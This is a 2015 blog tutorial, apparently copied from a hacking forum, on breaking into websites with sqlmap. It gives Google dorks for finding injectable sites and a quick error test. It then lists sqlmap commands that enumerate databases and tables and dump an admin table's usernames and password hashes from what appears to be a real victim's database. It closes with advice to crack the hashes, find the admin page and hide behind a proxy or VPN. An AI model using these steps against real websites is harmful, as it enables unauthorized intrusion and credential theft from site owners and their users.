Monday, September 21, 2015

HACK WEBSITE USING SQLMAP | KALI LINUX - BACKTRACK (Only For Education)



Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. 
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find Sql vulnerable site. 
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.

Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " " at the end of the url. Like on the image below:

[Image: image1_zps1ba326d9.jpg]

And press enter. If error appears like on the image below it means the website is vulnerable. 

[Image: image2_zpsffcf021f.jpg]


(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)


Ok, so we found the target. Now let's go ahed.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:

Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
[Image: image3_zps85f6aa32.jpg]


Now we will get the database name of the website.

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
[Image: image4_zps29fa4d64.jpg]


We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter. 

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables


Image has been scaled down 4% (700x49). Click this bar to view original image (723x50). Click image to open in new window.
[Image: image5_zpsf83a99b1.jpg]


Now we will get the tables list which is stored in the database we selected.

Image has been scaled down 3% (700x257). Click this bar to view original image (717x263). Click image to open in new window.
[Image: image6_zps002b2bf8.jpg]


Now lets grab the columns from the admin table , type on terminal:

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns

Now we got the columns and we got user and pass like on the image below

Image has been scaled down 1% (700x130). Click this bar to view original image (703x130). Click image to open in new window.
[Image: image7_zpsfb061ca9.jpg]


Now let's grab the user and pass

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

[Image: image8_zpsc0a432ae.jpg]

Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF.
The only thing which is left now is to find the admin page and remember to use Proxy/Vpn !

[*]Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr -> share -> sqlmap -> output


That's all , I hope you enjoyed the tutorial.